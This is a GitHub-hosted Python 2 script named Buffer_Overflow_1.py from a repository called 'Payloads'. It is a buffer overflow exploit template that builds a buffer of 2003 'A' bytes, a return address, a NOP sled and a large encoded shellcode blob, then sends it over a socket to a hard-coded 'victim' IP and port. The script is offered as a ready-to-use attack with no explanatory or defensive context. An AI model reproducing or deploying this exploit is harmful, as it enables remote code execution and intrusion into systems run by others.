forked from sh377c0d3/Payloads
-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathBuffer_Overflow_1.py
45 lines (39 loc) · 1.99 KB
/
Buffer_Overflow_1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import socket
import sys
buff = "Vuln Service" # Enter Vulnerable Service
buff += "A" * 2003
buff += "\xAF\x11\x50\x62"
buff += "\x90" * 10
buff += b""
buff += b"\xda\xd3\xd9\x74\x24\xf4\xba\x91\x65\x54\xa4\x5e\x29"
buff += b"\xc9\xb1\x52\x31\x56\x17\x83\xc6\x04\x03\xc7\x76\xb6"
buff += b"\x51\x1b\x90\xb4\x9a\xe3\x61\xd9\x13\x06\x50\xd9\x40"
buff += b"\x43\xc3\xe9\x03\x01\xe8\x82\x46\xb1\x7b\xe6\x4e\xb6"
buff += b"\xcc\x4d\xa9\xf9\xcd\xfe\x89\x98\x4d\xfd\xdd\x7a\x6f"
buff += b"\xce\x13\x7b\xa8\x33\xd9\x29\x61\x3f\x4c\xdd\x06\x75"
buff += b"\x4d\x56\x54\x9b\xd5\x8b\x2d\x9a\xf4\x1a\x25\xc5\xd6"
buff += b"\x9d\xea\x7d\x5f\x85\xef\xb8\x29\x3e\xdb\x37\xa8\x96"
buff += b"\x15\xb7\x07\xd7\x99\x4a\x59\x10\x1d\xb5\x2c\x68\x5d"
buff += b"\x48\x37\xaf\x1f\x96\xb2\x2b\x87\x5d\x64\x97\x39\xb1"
buff += b"\xf3\x5c\x35\x7e\x77\x3a\x5a\x81\x54\x31\x66\x0a\x5b"
buff += b"\x95\xee\x48\x78\x31\xaa\x0b\xe1\x60\x16\xfd\x1e\x72"
buff += b"\xf9\xa2\xba\xf9\x14\xb6\xb6\xa0\x70\x7b\xfb\x5a\x81"
buff += b"\x13\x8c\x29\xb3\xbc\x26\xa5\xff\x35\xe1\x32\xff\x6f"
buff += b"\x55\xac\xfe\x8f\xa6\xe5\xc4\xc4\xf6\x9d\xed\x64\x9d"
buff += b"\x5d\x11\xb1\x32\x0d\xbd\x6a\xf3\xfd\x7d\xdb\x9b\x17"
buff += b"\x72\x04\xbb\x18\x58\x2d\x56\xe3\x0b\x58\xaf\xbf\xe3"
buff += b"\x34\xad\x3f\xf0\x16\x38\xd9\x92\x86\x6d\x72\x0b\x3e"
buff += b"\x34\x08\xaa\xbf\xe2\x75\xec\x34\x01\x8a\xa3\xbc\x6c"
buff += b"\x98\x54\x4d\x3b\xc2\xf3\x52\x91\x6a\x9f\xc1\x7e\x6a"
buff += b"\xd6\xf9\x28\x3d\xbf\xcc\x20\xab\x2d\x76\x9b\xc9\xaf"
buff += b"\xee\xe4\x49\x74\xd3\xeb\x50\xf9\x6f\xc8\x42\xc7\x70"
buff += b"\x54\x36\x97\x26\x02\xe0\x51\x91\xe4\x5a\x08\x4e\xaf"
buff += b"\x0a\xcd\xbc\x70\x4c\xd2\xe8\x06\xb0\x63\x45\x5f\xcf"
buff += b"\x4c\x01\x57\xa8\xb0\xb1\x98\x63\x71\xc1\xd2\x29\xd0"
buff += b"\x4a\xbb\xb8\x60\x17\x3c\x17\xa6\x2e\xbf\x9d\x57\xd5"
buff += b"\xdf\xd4\x52\x91\x67\x05\x2f\x8a\x0d\x29\x9c\xab\x07"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.10.27', 9501)) # Victim IP and Port
print s.recv(1024)
s.send(buff)
s.close()